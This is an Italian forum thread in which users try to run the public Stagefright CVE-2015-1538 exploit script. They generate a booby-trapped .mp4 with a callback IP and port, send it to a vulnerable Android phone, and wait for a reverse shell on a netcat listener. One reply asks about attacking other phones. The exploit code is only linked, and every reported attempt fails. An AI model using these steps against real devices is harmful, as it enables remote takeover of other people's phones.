Domanda Stagefright CVE 1538 Script

Stato
Discussione chiusa ad ulteriori risposte.

0v3rl04d

Utente Silver
18 Giugno 2014
60
2
13
56
Ciao a tutti,

dopo la scoperta da parte di Zimperium del noto Stagefright, ho cominciato ad informarmi sull'argomento in particolare su come proteggermi e sul funzionamento della libreria in questione.

Mi sono imbattuto in seguito nello script python scritto da uno degli Hacker di Zimperium.
https://github.com/jduck/cve-2015-1538-1/blob/master/Stagefright_CVE-2015-1538-1_Exploit.py

Ho provato ad eseguirlo e a risolvere i vari problemi... Per prima cosa ho rinominato lo script in mp4.py, in modo che diventasse ricorsivo. Ho poi usato python2.7 per far partire lo script (in quanto con la 3.x da problemi di codifica), dopo di che ho fatto partire lo script in questo modo:

Codice:
python2.7 -c [Mio IP] -p 4444

A questo punto viene generato un file.mp4 che ho inviato tramite email al me stesso su un telefono vulnerabile a stagefright. Prima di aprire il file sul telefono ho aperto un listener sul mio pc per la shell di ritorno.

Codice:
netcat -l -p 4444

Quando apro il video sul telefono, sul pc non si apre la shell come dovrebbe...

Qualcuno di voi a fatto dei test?
 
  • Mi piace
Reazioni: j4rv1s
Ciao mi unisco anch' io poichè ho il tuo stesso problema, se qualcuno di voi ragazzi ne sa qualcosa rispondete per favore :)
 
Ultima modifica:
L'app di Zimperium è abbastanza ambigua nella colorazione. Mi spiego meglio, faccio il test con l'app per vedere se sono vulnerabile a stagefright e mi da un risultato positivo. Mi fa anche vedere i moduli CVE a cui sono vulnerabile. L'unica cosa che non si capisce è se sono quelli verdi o quelli rossi i moduli che sono buggati sul mio telefono. Ho provato su altri dispositivi per togliermi il dubbio ma non sono comunque riuscito ad arrivarne a capo.

Nella lista dei moduli sul mio telefono mi da CVE 1538 in verde
 
L'app di Zimperium è abbastanza ambigua nella colorazione. Mi spiego meglio, faccio il test con l'app per vedere se sono vulnerabile a stagefright e mi da un risultato positivo. Mi fa anche vedere i moduli CVE a cui sono vulnerabile. L'unica cosa che non si capisce è se sono quelli verdi o quelli rossi i moduli che sono buggati sul mio telefono. Ho provato su altri dispositivi per togliermi il dubbio ma non sono comunque riuscito ad arrivarne a capo.

Nella lista dei moduli sul mio telefono mi da CVE 1538 in verde
Se non sbaglio sono quelle evidenziate in verde !

Inviato dal mio zioBlack-Device utilizzando Tapatalk
 
Scusate che io sappia nel codice di stagefright quando vai ad eseguirlo gli unici input da dare sono -c , -p , rop_pivot e spray_addr. Il codice non agiste su ogni tipo di cve vulnerabile? O devi inserire tu uno specifico?
E comunque ancora non mi è chiaro se devi bindare l output .mp4 con un video gia esistente oppure inviare solo l mp4 generato che ovviamente il player di android non sara in grado di eseguire.
 
Scusate che io sappia nel codice di stagefright quando vai ad eseguirlo gli unici input da dare sono -c , -p , rop_pivot e spray_addr. Il codice non agiste su ogni tipo di cve vulnerabile? O devi inserire tu uno specifico?
E comunque ancora non mi è chiaro se devi bindare l output .mp4 con un video gia esistente oppure inviare solo l mp4 generato che ovviamente il player di android non sara in grado di eseguire.
Lo script python creato in questione sfrutta solo il CVE 1538 e come parametri fondamentali basta -c per l'IP di ritorno e - p per la porta di ascolto.

Il file.mp4 non credo sia necessario includerlo in una sequenza video, anche perchè se per caso codifichi il video finale rischi che la parte malware del video non agisca più nel modo dovuto dopo la codifica.
 
Quindi mi state dicendo che il codice python di stagefright pubblicato da Zimperium agisce solo su CVE 1538 e non sui restanti? quindi con questo codice posso solo attaccare i cell con CVE 1538 e non quelli vulnerabili, ad esempio, a CVE 1539, 3824, ecc... ?
 
Quindi mi state dicendo che il codice python di stagefright pubblicato da Zimperium agisce solo su CVE 1538 e non sui restanti? quindi con questo codice posso solo attaccare i cell con CVE 1538 e non quelli vulnerabili, ad esempio, a CVE 1539, 3824, ecc... ?

Cercando su exploit-db si trova anche CVE-3886, sempre uno script in python. Anche questo cercherò di farlo eseguire ma è ancora più ostico perchè richiede una shell esterna in formato bin.
https://www.exploit-db.com/search/?action=search&description=stagefright&e_author=
 
Nisba, non riesco ad arrivarne a capo! Sono giorni che provo su terminali diversi. L'unica cosa che forse sono riuscito a capire è che essendo uno script testato e creato appositamente per funzionare su un Nexus 4 con 4.4.2, l'indirizzo di memoria in cui viene eseguito exploit è diverso per ogni terminale.

Nessuno di voi a provato ad eseguire questo script?
 
No ! Domani se ho tempo di un occhiata e se ne vengo a capo ti dico :)

Inviato dal mio zioBlack-Device utilizzando Tapatalk
 
Mi sa che non riceverò risposta. Io dopo svariati test non so più che fare. Ho provato anche tramite AVD con versioni precedenti la 5.0... ma nulla
 
Stato
Discussione chiusa ad ulteriori risposte.